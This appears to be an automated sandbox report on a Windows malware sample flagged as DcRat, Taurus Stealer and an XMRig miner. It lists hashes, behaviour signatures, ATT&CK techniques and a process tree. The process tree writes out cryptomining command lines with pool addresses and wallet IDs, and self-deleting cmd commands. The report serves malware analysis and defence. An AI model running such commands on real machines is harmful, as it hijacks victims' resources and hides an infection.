Analysis

  • max time kernel
    24s
  • max time network
    81s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    04-04-2021 11:52

General

  • Target

    file.exe

  • Size

    126KB

  • MD5

    fdefd1e361d1020577bf018a5a98040c

  • SHA1

    2d7c4cfa15f4cb29ce95e7a59c3089a081a772a2

  • SHA256

    01cb6ab274dc0ac90192b537a606965d98f03d99c95b3a0e24bc6cad724d42c7

  • SHA512

    adb42dc5cc31b95f6e3d463068d57480acb50c80ce49f4fabd0fa87700dda3d92afe543f2569f2e92077afd0d00869c5cdf24902968050132eccd9a230719378

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Taurus Stealer

    Taurus is an infostealer first seen in June 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 60 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Loads dropped DLL
    • Modifies data under HKEY_USERS
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Users\Admin\AppData\Roaming\4B9B.tmp.exe
      "C:\Users\Admin\AppData\Roaming\4B9B.tmp.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:1016
      • C:\Windows\system32\msiexec.exe
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        3⤵
          PID:556
        • C:\Windows\system32\msiexec.exe
          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of AdjustPrivilegeToken
          PID:2012
      • C:\Users\Admin\AppData\Roaming\4C95.tmp.exe
        "C:\Users\Admin\AppData\Roaming\4C95.tmp.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:316
        • C:\Windows\SysWOW64\cmd.exe
          /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\4C95.tmp.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1912
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 3
            4⤵
            • Delays execution with timeout.exe
            PID:1308
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:1652
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:1056

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Credential Access

    Credentials in Files

    3
    T1081

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Remote System Discovery

    1
    T1018

    Collection

    Data from Local System

    3
    T1005

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      MD5

      61a03d15cf62612f50b74867090dbe79

      SHA1

      15228f34067b4b107e917bebaf17cc7c3c1280a8

      SHA256

      f9e23dc21553daa34c6eb778cd262831e466ce794f4bea48150e8d70d3e6af6d

      SHA512

      5fece89ccbbf994e4f1e3ef89a502f25a72f359d445c034682758d26f01d9f3aa20a43010b9a87f2687da7ba201476922aa46d4906d442d56eb59b2b881259d3

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      747e2d9bd4f70f1649bbee88db5f1f20

      SHA1

      03f5763404e0d890ef66875b6790486053a617de

      SHA256

      d3d987e044ad928ce3b3f259711f084ff0adeddf16bd534f625d90033603fb06

      SHA512

      1dcb79bf19ae77c1190553001680ef73bdcfd215f574a7b79c87be84f5ddb29a3a829d113a8ea4432181ab42275eb90b9a7ba10ccd5faa7ff76014fd40803026

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      7a047bafb66368eb6dc662f34d8d5f97

      SHA1

      3dddf2207a65ed9a0a936a8ced21afe4b31224e4

      SHA256

      ee687417f3cf911ea2f582e267f638624230a430865d080cbfea1bbea1c6f5d5

      SHA512

      cd612d6d86a73b8cbd25a50ba25bc586aab0c26b95eafb8c34745ab67f4de11d1a67b9a9df5a2bc6b610eaeac79fecad1e627081ced270242bec116479f53a15

    • C:\Users\Admin\AppData\Roaming\4B9B.tmp.exe
      MD5

      01e6cae5a0f506d2b3b01162bcc7b078

      SHA1

      6e6d05630da0163a38a70865280fcad42ab1c74d

      SHA256

      25e36c95be9a4255ae41717a89b4f3749bc438640fc48be7b7560cd1afb855d1

      SHA512

      ee4fa60e70f6532896633a6c2f683405fa2f4246b9e4336a9a0171124e21761153c859f2ca69207e0e1a4f8979d192727c0b6c05879f4676646c1c12010a77ea

    • C:\Users\Admin\AppData\Roaming\4B9B.tmp.exe
      MD5

      01e6cae5a0f506d2b3b01162bcc7b078

      SHA1

      6e6d05630da0163a38a70865280fcad42ab1c74d

      SHA256

      25e36c95be9a4255ae41717a89b4f3749bc438640fc48be7b7560cd1afb855d1

      SHA512

      ee4fa60e70f6532896633a6c2f683405fa2f4246b9e4336a9a0171124e21761153c859f2ca69207e0e1a4f8979d192727c0b6c05879f4676646c1c12010a77ea

    • C:\Users\Admin\AppData\Roaming\4C95.tmp.exe
      MD5

      98d0976214fb5720a6b2c23ba035b741

      SHA1

      1eb4da1f7de4ca6718d75c6ac713b6324948ad6c

      SHA256

      553e5fd6df66c3d38733e1942ffbf2557843fc19c48fa1a2379eee9eb528c144

      SHA512

      4a1bf187b5483d70925cb1ae91090f2abde87ecd115d298f01e0c9c0b9bf428c53b3db6c6173aaf4b96cc345b093cd95cf2641894dc7b1edfdc2689ef6582925

    • C:\Users\Admin\AppData\Roaming\4C95.tmp.exe
      MD5

      98d0976214fb5720a6b2c23ba035b741

      SHA1

      1eb4da1f7de4ca6718d75c6ac713b6324948ad6c

      SHA256

      553e5fd6df66c3d38733e1942ffbf2557843fc19c48fa1a2379eee9eb528c144

      SHA512

      4a1bf187b5483d70925cb1ae91090f2abde87ecd115d298f01e0c9c0b9bf428c53b3db6c6173aaf4b96cc345b093cd95cf2641894dc7b1edfdc2689ef6582925

    • \Users\Admin\AppData\Roaming\4B9B.tmp.exe
      MD5

      01e6cae5a0f506d2b3b01162bcc7b078

      SHA1

      6e6d05630da0163a38a70865280fcad42ab1c74d

      SHA256

      25e36c95be9a4255ae41717a89b4f3749bc438640fc48be7b7560cd1afb855d1

      SHA512

      ee4fa60e70f6532896633a6c2f683405fa2f4246b9e4336a9a0171124e21761153c859f2ca69207e0e1a4f8979d192727c0b6c05879f4676646c1c12010a77ea

    • \Users\Admin\AppData\Roaming\4C95.tmp.exe
      MD5

      98d0976214fb5720a6b2c23ba035b741

      SHA1

      1eb4da1f7de4ca6718d75c6ac713b6324948ad6c

      SHA256

      553e5fd6df66c3d38733e1942ffbf2557843fc19c48fa1a2379eee9eb528c144

      SHA512

      4a1bf187b5483d70925cb1ae91090f2abde87ecd115d298f01e0c9c0b9bf428c53b3db6c6173aaf4b96cc345b093cd95cf2641894dc7b1edfdc2689ef6582925

    • \Users\Admin\AppData\Roaming\4C95.tmp.exe
      MD5

      98d0976214fb5720a6b2c23ba035b741

      SHA1

      1eb4da1f7de4ca6718d75c6ac713b6324948ad6c

      SHA256

      553e5fd6df66c3d38733e1942ffbf2557843fc19c48fa1a2379eee9eb528c144

      SHA512

      4a1bf187b5483d70925cb1ae91090f2abde87ecd115d298f01e0c9c0b9bf428c53b3db6c6173aaf4b96cc345b093cd95cf2641894dc7b1edfdc2689ef6582925

    • memory/316-27-0x0000000000400000-0x000000000587C000-memory.dmp
      Filesize

      84.5MB

    • memory/316-18-0x00000000073A0000-0x000000000C81C000-memory.dmp
      Filesize

      84.5MB

    • memory/316-10-0x0000000000000000-mapping.dmp
    • memory/556-23-0x0000000140000000-0x0000000140383000-memory.dmp
      Filesize

      3.5MB

    • memory/556-16-0x0000000140000000-0x0000000140383000-memory.dmp
      Filesize

      3.5MB

    • memory/556-19-0x00000001401FBC30-mapping.dmp
    • memory/904-4-0x000007FEF7D90000-0x000007FEF800A000-memory.dmp
      Filesize

      2.5MB

    • memory/1016-13-0x000007FEFC601000-0x000007FEFC603000-memory.dmp
      Filesize

      8KB

    • memory/1016-6-0x0000000000000000-mapping.dmp
    • memory/1056-34-0x0000000000000000-mapping.dmp
    • memory/1308-30-0x0000000000000000-mapping.dmp
    • memory/1652-33-0x0000000000000000-mapping.dmp
    • memory/1724-17-0x0000000002190000-0x00000000021D8000-memory.dmp
      Filesize

      288KB

    • memory/1724-2-0x0000000000020000-0x000000000002D000-memory.dmp
      Filesize

      52KB

    • memory/1724-3-0x00000000761E1000-0x00000000761E3000-memory.dmp
      Filesize

      8KB

    • memory/1912-29-0x0000000000000000-mapping.dmp
    • memory/2012-21-0x00000001402CA898-mapping.dmp
    • memory/2012-26-0x0000000140000000-0x000000014070A000-memory.dmp
      Filesize

      7.0MB

    • memory/2012-31-0x00000000001F0000-0x0000000000210000-memory.dmp
      Filesize

      128KB

    • memory/2012-25-0x0000000140000000-0x000000014070A000-memory.dmp
      Filesize

      7.0MB

    • memory/2012-24-0x0000000000100000-0x0000000000114000-memory.dmp
      Filesize

      80KB

    • memory/2012-20-0x0000000140000000-0x000000014070A000-memory.dmp
      Filesize

      7.0MB